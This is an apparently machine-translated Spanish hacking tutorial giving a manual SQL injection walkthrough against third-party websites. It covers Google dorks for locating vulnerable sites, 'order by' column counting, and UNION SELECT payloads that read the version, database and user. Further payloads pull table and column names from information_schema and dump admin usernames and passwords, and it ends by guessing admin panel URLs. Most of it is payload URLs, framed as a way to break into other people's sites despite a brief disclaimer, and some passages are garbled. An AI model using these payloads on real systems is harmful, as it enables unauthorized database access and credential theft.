TODO SOBRE LA INDUCCIÓN DIRECTA MANUAL


Descargo de responsabilidad

Toda la información proporcionada en este libro es solo para fines educativos, si cualquiera se encontrará en una actividad ilegal, entonces no tenemos ninguna responsabilidad para esto.


Una nota importante antes de comenzar

Hackear es un Arte de Inteligencia; si no tienes este Arte, entonces deja el libro ahora y descansa, de lo contrario sentirás un dolor de cabeza. Si eres la persona con experiencia de este arte entonces lo entenderás muy fácilmente. Solo recuerda una cosa que no hay las habilidades especiales necesitan aprender algo nuevo, solo la mente debe ser positiva y siempre abierto con nitidez para comprender.


CAPÍTULO 1:


Guía completa de INYECCIÓN SQL:


Antes de ver qué es SQL Injection. Deberíamos saber qué son SQL y Database.


Base de datos:

La base de datos es una recopilación de datos. En una ubicación conectada a Internet que mantiene uno o más puntos de vista de las páginas web, la base de datos se usa para almacenar usuarios identificadores, contraseñas, detalles de la página web y más. Algunas listas de bases de datos son:


Servidores de bases de datos,

MySQL (fuente abierta),

MSSQL,

MS-ACCESS,

Oracle,

Postgre SQL (código abierto),

SQLite,


SQL:

El lenguaje de consulta estructurado se conoce como SQL. Para comunicarnos con la base de datos, somos usando consulta SQL. Estamos consultando la base de datos por lo que se llama como lenguaje de consulta.


Definición de referencia completa:

SQL es una herramienta para organizar, administrar y recuperar datos almacenados en una computadora base de datos. El nombre "SQL" es la abreviatura de Structured Query Language. por razones históricas, SQL generalmente se pronuncia "secuela", pero la pronunciación alternativa "S.Q.L." también se usa. Como su nombre lo indica, SQL es un lenguaje de computadora que usas para interactuar con una base de datos De hecho, SQL funciona con un tipo específico de base de datos, llamado base de datos relacional.


Consultas básicas simples para SQL:

Seleccione * de table_name: esta declaración se usa para mostrar el contenido de las tablas, incluido el nombre de la columna.


por ejemplo:

seleccione * de usuarios;


Insertar en table_name (column_names, ...) valores (valores correspondientes para las columnas): Para insertar datos en la tabla.


e.g .: insertar en los usuarios (username, userid) values ​​("BreakTheSec", "break"); Daré más detalles y consultas en mi próximo libro sobre SQL QUERY.


¿Qué es la inyección de SQL?

La inyección de SQL es un método común y famoso de piratear el presente. Algunos novatos piensan que esto es algo pequeño debido a algún software kiddy o escrito como "Havij ?, pero si lo ves manualmente entonces es un tema enorme y muchos libros se pueden escribir fácilmente sobre esto. Usando este método una persona no autorizada persona puede acceder a la base de datos de un sitio web. El atacante puede obtener todos los detalles de la base de datos.


¿Qué puede hacer un atacante?

Mediante el inicio de sesión de los inicios de sesión

Acceder a datos secretos

Modificar los contenidos del sitio web

Cerrar el servidor My SQL


Ahora profundicemos en el procedimiento real para la inyección de SQL.


Paso 1:


Encontrar sitio web vulnerable:


Nuestro mejor socio para la inyección de SQL es Google. Podemos encontrar los sitios web vulnerables (sitios web pirateables) usando la lista de Google Dork. Google dork está buscando sitios web vulnerables utilizando la búsqueda de Google trucos. Hay muchos trucos para buscar en Google. Pero vamos a usar el comando "inurl:" para encontrar los sitios web vulnerables.


Some Examples:

inurl:index.php?id=

inurl:gallery.php?id=

inurl:article.php?id=

inurl:pageid=


Si desea obtener más información, busque en Google las últimas versiones de SQL.


¿Cómo usar?


Copie uno de los comandos anteriores y péguelo en el cuadro del motor de búsqueda de Google. Presiona enter.

Puede obtener una lista de sitios web. Tenemos que visitar los sitios web uno por uno para verificar la vulnerabilidad. Así que comience desde el primer sitio web.

Nota: si desea piratear un sitio web específico, intente lo siguiente:

sitio: www.victimsite.com dork_list_commands

por ejemplo:

sitio: www.victimsite.com inurl: index.php? id =


Paso 2:


Comprobación de la vulnerabilidad:


Ahora deberíamos verificar la vulnerabilidad de los sitios web. Para verificar la vulnerabilidad, agregue el único comillas (') al final de la url y presiona enter. (No hay espacio entre el número y las comillas simples)


por ejemplo:

http://www.victimsite.com/index.php?id=2'

Si la página permanece en la misma página o muestra esa página no encontrada o muestra algunas otras páginas web. Entonces no es vulnerable.

Si muestra algún error relacionado con la consulta sql, entonces es vulnerable. Aclamaciones..! !

por ejemplo:

Tiene un error en su sintaxis SQL; revise el manual que corresponde a su servidor MySQL versión para la sintaxis correcta para usar cerca de '' 'en la línea 1


Paso 3:


Cómo encontrar el número de columnas:


Ahora hemos encontrado que una ubicación conectada a Internet que mantiene una o más páginas web es vulnerable. El siguiente paso es encontrar el número de columnas en la tabla. Para eso, reemplace las comillas simples (') con la instrucción "ordenar por n" (deje un espacio entre el número y orden por n declaración)

Cambie el n de 1,2,3,4,, 5,6, ... n. Hasta que obtenga el error como "columna desconocida".


por ejemplo:


http://www.victimsite.com/index.php?id=2 order by 1

http://www.victimsite.com/index.php?id=2 order by 2

http://www.victimsite.com/index.php?id=2 order by 3

http://www.victimsite.com/index.php?id=2 order by 4


cambie el número hasta que obtenga el error como "columna desconocida"


si obtiene el error al intentar el número "x", entonces ninguna columna es "x-1".


Quiero decir:

http://www.victimsite.com/index.php?id=2 order by 1(noerror)

http://www.victimsite.com/index.php?id=2 order by 2(noerror)

http://www.victimsite.com/index.php?id=2 order by 3(noerror)

http://www.victimsite.com/index.php?id=2 order by 4(noerror)

http://www.victimsite.com/index.php?id=2 order by 5(noerror)

http://www.victimsite.com/index.php?id=2 order by 6(noerror)

http://www.victimsite.com/index.php?id=2 order by 7(noerror)

http://www.victimsite.com/index.php?id=2 order by 8(error)

so now x=8 , The number of column is x-1 i.e, 7 .


En ocasiones, lo anterior puede no funcionar. En ese momento agregue el "-" al final de la declaración.

por ejemplo:

http://www.victimsite.com/index.php?id=2 order by 1--



Paso 4:


Mostrando las columnas Vulnerables:


Usando "union select columns_sequence" podemos encontrar la parte vulnerable de la tabla. Reemplace la "ordenar por n" con esta afirmación. Y cambie el valor de id a negativo (quiero decir id = -2, debe cambiar, pero en algunas ubicaciones conectadas a Internet que mantienen una o más páginas web pueden funcionar sin cambios).


Reemplace column_sequence con el no de 1 a x-1 (número de columnas) separado con comas (,).


por ejemplo:

si el número de columnas es 7, la consulta es la siguiente:

http://www.victimsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7--

Si el método anterior no funciona, intente esto:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--

Mostrará algunos números en la página (debe ser menor que el valor 'x', me refiero a menos o equl a número de columnas).


Así:

Ahora selecciona 1 número.

Muestra 3,7. Tomemos el número 3.


Paso 5:


Búsqueda de versión, base de datos, usuario


Ahora reemplaza el 3 de la consulta con "versión ()"


por ejemplo:

http://www.victimsite.com/index.php?id=-2 y 1 = 2 union select 1,2, version (), 4,5,6,7 -


Mostrará la versión como 5.0.1 o 4.3. Algo le gusta esto.


Reemplace la versión () con database () y user () para buscar la base de datos, usuario, respectivamente.


por ejemplo:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7--


http://www.victimsite.com/index.php?id=-

and 1=2 union select 1,2,user(),4,5,6,7--

If the above is not working, then try this:

http://www.victimsite.com/index.php?id=-2and 1=2 union select

1,2,unhex(hex(@@version)),4,5,6,7--



Paso 6:


Cómo encontrar el nombre de la tabla


Si la versión es 5 o superior. Luego sigue estos pasos. Ahora tenemos que encontrar el nombre de la tabla del base de datos. Reemplace el 3 con "group_concat (table_name) y agregue el" from information_schema.tables donde table_schema = database () "


por ejemplo:


http://www.victimsite.com/index.php?id=-2 and 1=2 union select

1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where

table_schema=database()--


Ahora mostrará la lista de nombres de tabla. Encuentre el nombre de la tabla que está relacionado con el administrador o el usuario.


Ahora selecciona la tabla "admin".


Si la versión es 4 u otras, debe adivinar los nombres de la tabla. (usuario, tbluser). Es duro y aburrido para hacer inyección sql con la versión 4.




Paso 7:


Cómo encontrar el nombre de la columna


Ahora reemplace el "group_concat (table_name) con el" group_concat (column_name) "


Reemplazar "de information_schema.tables donde table_schema = database () -" con "FROM

information_schema.columns WHERE table_name = mysqlchar -


Ahora escucha atentamente, tenemos que encontrar convertir el nombre de la tabla a cadena MySql CHAR () y reemplazar mysqlchar con eso.


Encuentre MysqlChar () para el nombre de tabla:

Primero, instale el complemento HackBar:

https://addons.mozilla.org/en-US/firefox/addon/3899

Ahora

seleccione sql-> Mysql-> MysqlChar ()



Esto abrirá la pequeña ventana, ingrese el nombre de la tabla que encontró. Voy a usar el administrador nombre de la tabla.



Haz clic en Aceptar

Ahora puede ver el CHAR (números separados por comas) en la barra de herramientas Hack.



Copie y pegue el código al final de la url en lugar de "mysqlchar"


por ejemplo:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select

1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where

table_name=CHAR(97, 100, 109, 105, 110)--


Ahora mostrará la lista de columnas.

like_admin, password, admin_id, admin_name, admin_password, active, id, admin_name, admin_pas s, admin_id, admin_name, admin_password, ID_admin, admin_username, username, password ..... etc.


Ahora reemplace el reemplazo group_concat (column_name) con group_concat (columnname, 0x3a, anothercolumnname).


El nombre de la columna debe reemplazarse del nombre de la columna indicada. anothercolumnname debe reemplazarse del nombre de columna listado.


Ahora reemplace el "de information_schema.columns donde table_name = CHAR (97, 100, 109, 105, 110) "con el" de table_name "


por ejemplo:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--


En algún momento mostrará que la columna no se encuentra.

Luego prueba con otros nombres de columnas


Ahora será Nombre de usuario y contraseñas.


¡Saludos .....!

Si la ubicación conectada a Internet que mantiene una o más páginas web tiene miembros, entonces jock-bot es para usted. Tendrás la lista de nombres de usuario y contraseña.


Algún tiempo puede que tengas los ID de correo electrónico también, disfruta que tienes el Dock que puede producir el dorado huevos.


Paso 8:


Cómo encontrar el Panel de administración:


Encontrar el panel de administración es un trabajo aburrido y lento, porque tienes que adivinar el panel de administración como:


http://www.victimsite.com/admin.php

http://www.victimsite.com/admin/

http://www.victimsite.com/admin.html

http://www.victimsite.com:2082/

etc.


Si tiene suerte, encontrará la página de administración.


Si desea la última lista de URL de administrador, búsquela en google, o es mejor utilizar la secuencia de comandos del panel de administración. en perl.




Advertisements